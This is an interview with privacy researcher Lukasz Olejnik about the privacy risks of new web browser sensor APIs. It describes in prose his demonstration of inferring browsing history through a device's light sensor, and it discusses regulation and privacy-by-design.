What if the light sensor of your phone could hijack your web browser history ?

LINC : Lukasz, as a privacy and security researcher, consultant and a W3C invited expert, what are the recent developments in web browsers that may impact users’ privacy ?

Lukasz Olejnik: Web browsers change all the time, with new interesting features included on a regular basis. We’re not only speaking about implementations and user interfaces.

Web browsers are becoming very powerful. They are no longer limited to simple browsing. Soon, web browsers will allow websites to interact with the devices in the user vicinity. This will be made possible thanks to the new browser mechanisms - APIs. Web browsers will be able to use new communication channels such as NFC or Bluetooth. Additionally, websites will also be able to take advantage of low-level smartphone and laptop sensors such as light sensors, accelerometers or gyroscopes, and more. Learning about the user environment will be within reach.

These features are either already present in some of the modern web browsers like Chrome, or will be implemented soon.

All this will certainly allow building very sophisticated and innovative web applications. But with this new power, it will be important to carefully design web browsers, as well as websites. Being aware of the possible risks, and preferably trying to mitigate these risks in advance. These technologies and their use should be well analyzed for security and privacy issues, and when relevant - also from the digital ethics point of view.

Fortunately, at least the browser vendors are treating privacy with increasing care. In 2017 we even experienced an interesting precedent. Firefox browser has removed an entire API - Battery Status API, allowing to read battery information. This decision has followed a long discussion of privacy concerns. It was my pleasure to take some part in this process. 

Can you tell us a bit more about your research project on smartphone sensors and in particular what can be inferred by a simple light sensor, apparently innocuous and not related to personal data ?

I am involved in security and privacy for about 10 years now, both in the scope of research, industry, and regulations. In my research, I assessed specifications, designs, and implementations. Recently, I put my focus on sensors. I analyzed a number of web APIs, and subsequently identified a number of possible privacy implications arising from certain uses of sensors on the web. Some of my analyses can be found on my blog . I’m happy with my contributions to W3C specifications.

As for the light sensor, the issue started with a discussion within the W3C working group. I had a feeling there was a need to demonstrate how the use of sensors may result in dealing with sensitive data. It so happens that one of the most indicative examples of web browser privacy issues is the ability to hijack web browser history. So why not show exfiltration of web browsing history using a light sensor? All the building blocks seemingly were there. Devices can be made to emit a varying level of light in response to displaying a link that was either visited or not. Subsequently, the light sensor reads the intensity of reflected light. Ultimately, a website might identify whether external sites have been visited by the user in the past.

Returning to the second part of your question - I have opportunities to work both on research, technologies and also regulation and policy aspects. Let’s think outside-the-box for a moment. How are life patterns connected to personal data? We’re speaking about behavioral information like mobility patterns, interaction with other people, possibly an insight about user possessions and other types of behavior. Precise sensor reads can provide insight into reasoning about this kind of information. The protection of sensitive data, in particular, behavioral profiles, are included even in the GDPR. Therefore, in specific contexts it might be a good idea to think about the relationship of GDPR’s broad definitions on system design. Potentially risky issues of this kind highlight not only the challenges related to web browsers but also the general challenges when assessing privacy of systems or products. Perhaps sometimes even on the level of data protection impact assessment, to ensure that control over data is maintained and that the systems are understood.

What solutions do you propose to limit privacy risks and misuse of data ?

The reality is that there are technical ways enabling the abuse of user data on the web. Users in general still cannot be sure that they are safe when following a simple action such as click on a link. To protect yourself, we can speak about configuring web browsers in a special manner, installing script or ad blockers. You can also consider installing a privacy-supporting web browser that has this all by default. You can also consider protections offered by frameworks of GDPR or ePrivacy, the regulation I had the pleasure to work on.

But in the end, technology is for the people. All this control should be much easier. I believe technologies should be designed in a proper way, including both security and privacy engineering best practices. It’s not only about understanding the use cases. It is also about identifying the challenges - such as privacy risks. This means that the auditing of standards, systems, and technologies should preferably be done as early as possible.